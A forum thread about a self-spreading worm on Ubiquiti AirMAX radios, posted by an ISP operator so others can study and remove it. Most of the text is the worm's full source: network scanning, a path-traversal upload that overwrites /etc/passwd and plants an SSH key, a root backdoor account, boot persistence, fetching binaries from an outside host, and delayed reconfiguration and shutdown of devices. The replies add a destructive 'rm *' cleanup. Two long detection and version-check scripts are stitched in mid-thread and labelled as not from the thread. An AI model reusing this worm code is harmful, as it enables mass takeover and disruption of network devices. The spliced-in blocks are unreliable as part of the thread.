Virus attack - URGENT @UBNT


  • A
    Beta Testers

    Hi there,

    Since this afternoon MET we have had virus attacks on all AirMAX antennas with access to/from the Internet.

    It's a self-distributing virus, so once it can "see" neighbouring antennas within the same subnet, it attacks the others.

    Like all other viruses, it lives in the /etc/persistent path, creates a subpath ./.mf and a tarball mf.tar, and of course uses rc.poststart.

    Here the path structure:

    XM.v5.5.2# cd /etc/persistent/

    XM.v5.5.2# ls
    cardlist.txt dropbear_rsa_host_key rc.poststart
    dropbear_dss_host_key mf.tar

    XM.v5.5.2# cat rc.poststart
    cd /etc/persistent ; tar -xf mf.tar ; /etc/persistent/.mf/mother

    XM.v5.5.2# ls -al
    drwxr-xr-x 3 root admin 160 Aug 16 2012 .
    drwxr-xr-x 10 root admin 820 Aug 16 2012 ..
    drwxrwxr-x 2 1001 1001 320 May 13 11:23 .mf
    lrwxrwxrwx 1 root admin 21 Jan 1 1970 cardlist.txt -> /usr/etc/cardlist.txt
    -rw------- 1 root admin 457 Aug 16 2012 dropbear_dss_host_key
    -rw------- 1 root admin 427 Aug 16 2012 dropbear_rsa_host_key
    -rw------- 1 root admin 20480 May 13 11:21 mf.tar

    -rwxr-xr-x 1 root admin 65 May 13 11:21 rc.poststart

    XM.v5.5.2# cd .mf

    XM.v5.5.2# ls -al
    drwxrwxr-x 2 1001 1001 320 May 13 11:23 .
    drwxr-xr-x 3 root admin 160 Aug 16 2012 ..
    -rwxr-xr-x 1 root admin 64372 May 19 2009 curl
    -rwxrwxr-x 1 1001 1001 670 May 12 20:39 download
    -rwxrw-r-- 1 1001 1001 747 May 12 20:44 f u c k
    -rwxrw-r-- 1 1001 1001 199 May 12 20:44 f u c k e r
    -rwxrw-r-- 1 1001 1001 480 May 12 23:30 i
    -rwxrwxr-x 1 1001 1001 944 May 12 22:28 infect
    -rw-r--r-- 1 root admin 1062608 May 19 2009 libcrypto.so.0.9.8
    -rwxr-xr-x 1 root admin 207852 May 19 2009 libcurl.so.4
    -rw-r--r-- 1 root admin 223552 May 19 2009 libssl.so.0.9.8
    -rw------- 1 root admin 20480 Aug 16 2012 mf.tar
    -rw-r--r-- 1 1001 1001 427 May 12 19:38 mfid
    -rw-rw-r-- 1 1001 1001 232 May 12 19:39 mfid.pub
    -rwxrw-r-- 1 1001 1001 952 May 13 06:39 mother
    -rwxrwxr-x 1 1001 1001 1434 May 13 06:36 search

    We're just cleaning thousands of CPEs ...

    Hope it's helpful...

    It's attacking any FW version. I think it's using SSH port 22... Please investigate!!!

    Greez

    AMX


  • A
    Beta Testers

    cat search
    #!/bin/sh
    trap '' HUP
    chmod +x /etc/persistent/.mf/curl
    cd /etc/persistent/.mf/

    ip=$(ifconfig ath0 2>/dev/null | grep 'inet ' | sed "s/.inet addr:([^ ])./\1/g")
    if [ -z "$ip" ] ; then
    ip=$(ifconfig br0 2>/dev/null | grep 'inet ' | sed "s/.inet addr:([^ ])./\1/g")
    fi
    if [ -z "$ip" ] ; then
    ip=$(ifconfig ppp0 2>/dev/null | grep 'inet ' | sed "s/.inet addr:([^ ]).*/\1/g")
    fi
    p1=$(echo $ip | cut -d "." -f1)
    test ! -z "$p1" || p1=1
    test -z "$1" || p1=$(($p1+$1))
    p2=$(echo $ip | cut -d "." -f2)
    test ! -z "$p2" || p2=0
    test -z "$2" || p2=$(($p2+$2))
    p3=$(echo $ip | cut -d "." -f3)
    test ! -z "$p3" || p3=0
    p3c=0
    p2c=0
    p1c=0
    p4=0
    p5=0

    while [ $p1c -lt 224 ]
    do
    while [ $p2c -lt 255 ]
    do
    while [ $p3c -lt 255 ]
    do
    while [ $p4 -lt 255 ]
    do
    while [ $p5 -lt 4 ]
    do
    if [ $p5 = 0 ] ; then
    ip="$p1.$p2.$p3.$p4"
    fi
    if [ $p5 = 1 ] ; then
    ip="$p3.$p4.$p2.$p1"
    fi
    if [ $p5 = 2 ] ; then
    ip="$p1.$p3.$p2.$p4"
    fi
    if [ $p5 = 3 ] ; then
    rn="$(dd if=/dev/urandom bs=4 count=1)" 2>/dev/null >/dev/null
    num=echo $rn | hexdump -b 2>/dev/null | head -n 1 | cut -f 2-5 -d' ' | tr " " "."
    ip=$num
    fi

    /etc/persistent/.mf/infect $ip

    p5=$((p5+1))
    done
    p5=0
    p4=$((p4+1))
    done
    p4=0
    p3=$((p3+1))
    if [ "$p3" -gt 255 ] ; then p3=0 ; fi
    p3c=$((p3c+1))
    done
    p4=0
    p3c=0
    p3=0
    p2=$((p2+1))
    if [ "$p2" -gt 255 ] ; then p2=0 ; fi
    p2c=$((p2c+1))
    done
    p4=0
    p3=0
    p3c=0
    p2=0
    p2c=0
    p1=$((p1+1))
    if [ "$p1" -gt 223 ] ; then p1=1 ; fi
    p1c=$((p1c+1))
    done


  • A
    Beta Testers

    cat download
    #!/bin/sh
    per=/etc/persistent/.mf

    test -d /tmp/down || mkdir /tmp/down
    cd /tmp/down

    dwn() {
    wget -O temp.ipk $1
    tar -xzf temp.ipk
    tar -xzf data.tar.gz
    mv $2 $per
    rm -rf /tmp/down/*
    }

    test -e $per/curl || dwn http://downloads.openwrt.org/kamikaze/8.09.1/adm5120/packages/curl_7.17.1-1_mips.ipk usr/bin/curl
    chmod +x $per/curl
    test -e $per/libcurl.so.4 || dwn http://downloads.openwrt.org/kamikaze/8.09.1/adm5120/packages/libcurl_7.17.1-1_mips.ipk usr/lib/libcurl.so.4.0.1
    mv $per/libcurl.so.4.0.1 $per/libcurl.so.4
    test -e $per/libssl.so.0.9.8 || dwn http://downloads.openwrt.org/kamikaze/8.09.1/adm5120/packages/libopenssl_0.9.8i-3.1_mips.ipk 'usr/lib/lib*'


  • C
    Super Users

    What passwords were on these radios if any?


  • A
    Beta Testers

    cat f u c k
    #!/bin/sh
    url="http://$1"
    LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -L -k -c cookie $url
    LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F "uri=index.cgi" -F "username=mother" -F "password=f u c k e r" -H "Expect:" "$url/login.cgi"
    LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F "uri=reset.cgi" -H "Expect:" "${url}/reset.cgi"

    url="https://$1"
    LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -L -k -c cookie $url
    LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F "uri=index.cgi" -F "username=mother" -F "password=f u c k e r" -H "Expect:" "$url/login.cgi"
    LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F "uri=reset.cgi" -H "Expect:" "${url}/reset.cgi"


  • A
    Beta Testers

    cat f u c k er
    #!/bin/sh
    if [ -z "$1" ] ; then
    f=/tmp/inf
    else
    f=$1
    fi
    cd /etc/persistent/.mf

    cat $f | sort -r | while read ip ; do
    ./f u c k $ip
    done

    (sleep 99999; /etc/persistent/f u c k e r >/dev/null 2>/dev/null) &


  • A
    Beta Testers

    cat infect
    #!/bin/sh
    ip=$1
    trap '' HUP
    chmod +x /etc/persistent/.mf/curl
    cd /etc/persistent/.mf/

    if [ "$2" = "dbss" ] ; then
    ssh -f -y -y -i mfid mother@${ip} "tar -xf mf.tar ; /etc/persistent/.mf/i"
    exit 0
    fi

    cu() {
    wh=$1
    to=$2
    ur=$3
    LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -s -m 4 -F "file=@/etc/$wh;filename=../../etc/$to" -H "Expect:" "$ur/login.cgi" -k 2>/dev/null >/dev/null
    }

    is=LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -s -L -k -c /tmp/ac -m 3 $ip 2>/dev/null | grep airos | wc -l
    if [ "$is" = "1" ] ; then
    echo $ip >> /tmp/inf
    cu passwd passwd http://${ip}
    cu persistent/.mf/mfid.pub dropbear/authorized_keys http://${ip}
    cu persistent/.mf/mf.tar persistent/mf.tar http://${ip}
    cu passwd passwd https://${ip}
    cu persistent/.mf/mfid.pub dropbear/authorized_keys https://${ip}
    cu persistent/.mf/mf.tar persistent/mf.tar https://${ip}

    ( /etc/persistent/.mf/infect $ip dbss ) &
    ( sleep 15 ; killall ssh ) &
    sleep 17
    fi


  • A
    Beta Testers

    cat i
    #!/bin/sh
    per=/etc/persistent
    grep "mother" /etc/passwd >/dev/null || echo 'mother:$1$J1CHZtqy$n0XDmW4UCVAVYZqFzvoEC/:0:0:Administrator:/etc/persistent:/bin/sh' >> /etc/passwd
    grep "f/mother" $per/rc.poststart 2>/dev/null >/dev/null || echo "cd /etc/persistent ; tar -xf mf.tar ; $per/.mf/mother" >> $per/rc.poststart
    chmod +x $per/rc.poststart
    rm $per/mother
    rm $per/download
    rm $per/f u c k e r
    rm $per/search
    rm $per/curl
    rm $per/lib*
    cfgmtd -w -p /etc/

    reboot -n -f >/dev/null &


  • A
    Beta Testers

    cat mother
    #!/bin/sh
    per=/etc/persistent
    grep "mother" /etc/passwd >/dev/null || echo 'mother:$1$J1CHZtqy$n0XDmW4UCVAVYZqFzvoEC/:0:0:Administrator:/etc/persistent:/bin/sh' >> /etc/passwd

    iptables -I INPUT -p tcp –dport 80 -j DROP 2>/dev/null
    iptables -I INPUT -p tcp -i lo --dport 443 -j DROP 2>/dev/null

    cp $per/mf.tar $per/.mf/

    (sleep 90 ; $per/.mf/download )&
    (sleep 70 ; sleep 50 ; sleep 30 ; $per/.mf/search 2>/dev/null >/dev/null )&
    (sleep 70 ; sleep 50 ; sleep 35 ; $per/.mf/search 7 15 2>/dev/null >/dev/null )&
    (sleep 70 ; sleep 50 ; sleep 45 ; $per/.mf/search 0 64 2>/dev/null >/dev/null )&
    (sleep 70 ; sleep 50 ; sleep 55 ; $per/.mf/search 25 16 2>/dev/null >/dev/null )&

    (sleep 66666 ; $per/.mf/f u c k e r 2>/dev/null >/dev/null )&
    (sleep 666666 ; sed -i 's/wireless.1.ssid=./wireless.1.ssid=motherf u c k e r/' /tmp/system.cfg ; sed -i 's/radio.1.mode=./radio.1.mode=Master/' /tmp/system.cfg ; cfgmtd -f /tmp/system.cfg -w ; sleep 15 ; poweroff ) &


  • A
    Beta Testers

    special ones…of course NOT standard PWs and also other USER than the standards


  • C
    Super Users

    amx wrote:

    special ones…of course NOT standard PWs and also other USER than the standards


    What firmware?   There was an upgrade last summer to prevent an exploit.


  • Super Users

    ClaudeSS wrote:


    amx wrote:

    special ones…of course NOT standard PWs and also other USER than the standards


    What firmware?   There was an upgrade last summer to prevent an exploit.


    The CLI prompt in the OP looks like 5.5.2...

    Jim


  • L

    ClaudeSS wrote:


    amx wrote:

    special ones…of course NOT standard PWs and also other USER than the standards


    What firmware?   There was an upgrade last summer to prevent an exploit.


    5.5.2 according to the OP.

    http://community.ubnt.com/t5/airMAX-General-Discussion/5-6-3-and-5-6-4-Vulnerability/m-p/1562915#M54956


  • A
    Beta Testers

    at this moment any FW 5.x.x


  • J
    Beta Testers

    how to remove completely?
    any official position of ubiquiti? a tutorial type skynet


  • A
    Beta Testers

    I didn't see anything from UBNT at this moment. Here is the removal:

    cd /etc/persistent/
    rm mf.tar
    rm rc.poststart
    rm -R .mf
    cfgmtd -p /etc/persistent/ -w
    reboot
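Before running a removal like the one above, it helps to confirm which of the artifacts described in this thread are actually present on a radio, and to re-check afterwards that they are gone. The following POSIX sh script is an added example, not code from the thread or from Ubiquiti: it looks for the .mf directory, mf.tar, the rc.poststart hook that launches .mf/mother, the uid-0 "mother" account in /etc/passwd, and the worm's public key (mfid.pub) in dropbear's authorized_keys. The root prefix argument and the constructed sample tree in mf_demo are assumptions for offline use; the file names and paths come from the listings posted earlier in the thread.

```shell
#!/bin/sh
# mf_check.sh: defender-side check for the persistence artifacts this thread
# describes. Added example, not from the thread. ROOT defaults to / so it can
# run on an airOS radio itself; pass a copied or mounted tree to inspect it
# offline. Return value: number of indicators found (0 means clean).

mf_check() {
    root="${1:-/}"
    root="${root%/}"                      # drop trailing slash; "" means "/"
    per="$root/etc/persistent"
    found=0

    # payload directory and the archive rc.poststart unpacks it from
    if [ -d "$per/.mf" ]; then
        echo "FOUND: $per/.mf (payload directory)"; found=$((found+1))
    fi
    if [ -f "$per/mf.tar" ]; then
        echo "FOUND: $per/mf.tar (payload archive)"; found=$((found+1))
    fi
    # boot hook: the posted rc.poststart launches /etc/persistent/.mf/mother
    if [ -f "$per/rc.poststart" ] && grep -q 'mf/mother' "$per/rc.poststart"; then
        echo "FOUND: $per/rc.poststart starts .mf/mother"; found=$((found+1))
    fi
    # backdoor account 'mother' appended to /etc/passwd with uid 0
    if [ -f "$root/etc/passwd" ] && grep -q '^mother:' "$root/etc/passwd"; then
        echo "FOUND: account 'mother' in $root/etc/passwd"; found=$((found+1))
    fi
    # the worm's public key (mfid.pub) copied into dropbear's authorized_keys
    ak="$root/etc/dropbear/authorized_keys"
    if [ -s "$per/.mf/mfid.pub" ] && [ -f "$ak" ] \
       && grep -qxF -f "$per/.mf/mfid.pub" "$ak"; then
        echo "FOUND: key from .mf/mfid.pub in $ak"; found=$((found+1))
    fi

    [ "$found" -eq 0 ] && echo "clean: no mf indicators under ${root:-/}"
    return "$found"
}

# Build a constructed infected tree (sample data, not taken from a real
# device), run the check against it, clean up, and return the indicator count.
mf_demo() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/persistent/.mf" "$d/etc/dropbear"
    : > "$d/etc/persistent/mf.tar"
    echo 'cd /etc/persistent ; tar -xf mf.tar ; /etc/persistent/.mf/mother' \
        > "$d/etc/persistent/rc.poststart"
    printf 'root:x:0:0:root:/root:/bin/sh\nmother:x:0:0:Administrator:/etc/persistent:/bin/sh\n' \
        > "$d/etc/passwd"
    echo 'ssh-rsa AAAACONSTRUCTEDKEY mother@mf' > "$d/etc/persistent/.mf/mfid.pub"
    cp "$d/etc/persistent/.mf/mfid.pub" "$d/etc/dropbear/authorized_keys"
    rc=0; mf_check "$d" || rc=$?
    rm -rf "$d"
    return $rc
}

case "${0##*/}" in
    mf_check.sh) mf_check "${1:-/}" ;;   # run directly: check the given root
esac
```

Run it as `sh mf_check.sh` on the radio (or `sh mf_check.sh /mnt/copy` against a copied tree) before and after the removal; on a live device also look at `ps` for the search, mother and sleep processes the worm leaves running, and at `iptables -L INPUT` for the port 80/443 DROP rules its mother script inserts. Note that the `rm *` variant of the cleanup posted later in this thread also deletes the dropbear host keys that the original listing shows sitting next to mf.tar, so the selective `rm` above is the safer choice.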


  • A
    Beta Testers

    as the virus needs to download CURL, also block on your DNS this domain:

    downloads.openwrt.org


  • D
    Beta Testers

    Hello, since this morning all radios with firmware 5.5.x have been modified…
    To correct it, log in through SSH and delete everything with the following commands (you can copy and paste):

    cd /etc/persistent; rm -R mcuser; rm -R .mf; rm *; cfgmtd -w -p /etc/; killall -9 search; killall -9 mother; killall -9 sleep; reboot

    After restarting, switch ports 80, 22 and 443 ... and upgrade to version 5.6.4.

    for me it worked well.


  • Ubiquiti Employee

    As linked above…

    Anything prior to the following should be considered insecure.

    5.5.11 XM/TI.

    5.5.10u2 XW

    5.6.2 XW/XM/TI

    There have been some additional security improvements in 5.6.3/4

    If you haven't already, please subscribe to the airMAX blog for new release and security notices. It is very likely these devices were exploited using a known vulnerability that was addressed last year.  This exploit would allow an unauthenticated (no password required) user root/admin level control of any device with http/https exposed.

    http://community.ubnt.com/t5/airMAX-Updates-Blog/Security-Release-for-airMAX-TOUGHSwitch-and-airGateway-Released/ba-p/1300494
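Operators with a large fleet will want to turn the minimum versions in this post into a check they can run over an inventory. The POSIX sh helper below is an added example, not Ubiquiti's code: it parses a version such as 5.5.10u2, compares it field by field, and reports whether a version/platform pair is below the minimum stated here (5.5.11 for XM/TI, 5.5.10u2 for XW, 5.6.2 for all three). Two assumptions are mine: the 5.5 and 5.6 lines are judged separately (a 5.5.x release against the platform's 5.5 minimum, everything else against 5.6.2), and a "uN" suffix counts as an update number above the bare release, so 5.5.10 < 5.5.10u2 < 5.5.11. The airos_check_prompt helper accepts the CLI prompt format seen in the original post (XM.v5.5.2).

```shell
#!/bin/sh
# airos_minver.sh: report whether an airOS version is below the minimums
# given in this post. Added example, not Ubiquiti's code. Assumption: the
# 5.5 and 5.6 lines are judged separately, and a "uN" suffix is an update
# number above the bare release (5.5.10 < 5.5.10u2 < 5.5.11).

# Split "5.5.10u2" into "5 5 10 2" (major minor patch update); missing
# fields default to 0.
airos_fields() {
    v="$1"; upd=0
    case "$v" in *u*) upd="${v##*u}"; v="${v%%u*}" ;; esac
    maj=$(echo "$v" | cut -d. -f1)
    min=$(echo "$v" | cut -d. -f2)
    pat=$(echo "$v" | cut -d. -f3)
    echo "${maj:-0} ${min:-0} ${pat:-0} ${upd:-0}"
}

# True (exit 0) when version $1 sorts strictly before version $2.
airos_lt() {
    a=$(airos_fields "$1"); b=$(airos_fields "$2")
    set -- $a $b                         # $1..$4 from a, $5..$8 from b
    i=1
    while [ "$i" -le 4 ]; do
        eval "x=\$$i; y=\$$((i+4))"
        [ "$x" -lt "$y" ] && return 0
        [ "$x" -gt "$y" ] && return 1
        i=$((i+1))
    done
    return 1                             # equal
}

# Exit 0 if VERSION on PLATFORM (XM, XW or TI) is below the stated minimum,
# 1 if it is at or above it, 2 for an unknown platform.
airos_insecure() {
    ver="$1"; plat="$2"
    case "$plat" in
        XW)    min55=5.5.10u2 ;;
        XM|TI) min55=5.5.11 ;;
        *) echo "unknown platform: $plat" >&2; return 2 ;;
    esac
    airos_lt "$ver" 5.6.2 || return 1                    # 5.6.2 or later: fixed
    case "$ver" in
        5.5.*) airos_lt "$ver" "$min55" || return 1 ;;   # 5.5 line has its own minimum
    esac
    return 0
}

# Convenience: classify a CLI prompt in the form seen in the thread ("XM.v5.5.2").
airos_check_prompt() {
    plat="${1%%.*}"; ver="${1#*.v}"
    if airos_insecure "$ver" "$plat"; then
        echo "$1: $ver on $plat is below the minimum, treat as insecure"
    else
        echo "$1: $ver on $plat is at or above the minimum"
    fi
}

case "${0##*/}" in
    airos_minver.sh) airos_check_prompt "${1:-XM.v5.5.2}" ;;
esac
```

With the prompt from the original post, `sh airos_minver.sh XM.v5.5.2` reports the device as below the minimum, which matches the conclusion the replies above reach by eye; feeding it the output of a fleet-wide `ssh` sweep that captures each radio's prompt gives the same answer for every device.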


  • A
    Beta Testers

    Hi James.

    Thanks for the information.

    Ahm…just for my info: we're one of the largest WISPs in Spain and we didn't receive any Vulnerability Warning?

    Neither on direct way nor via our Wholesale Partner Landatel!?

    Will you pay the costs for cleaning up all customers' CPEs affected by this and other issues provoked by UBNT software failures?

    Thanks in advance for your feedback!

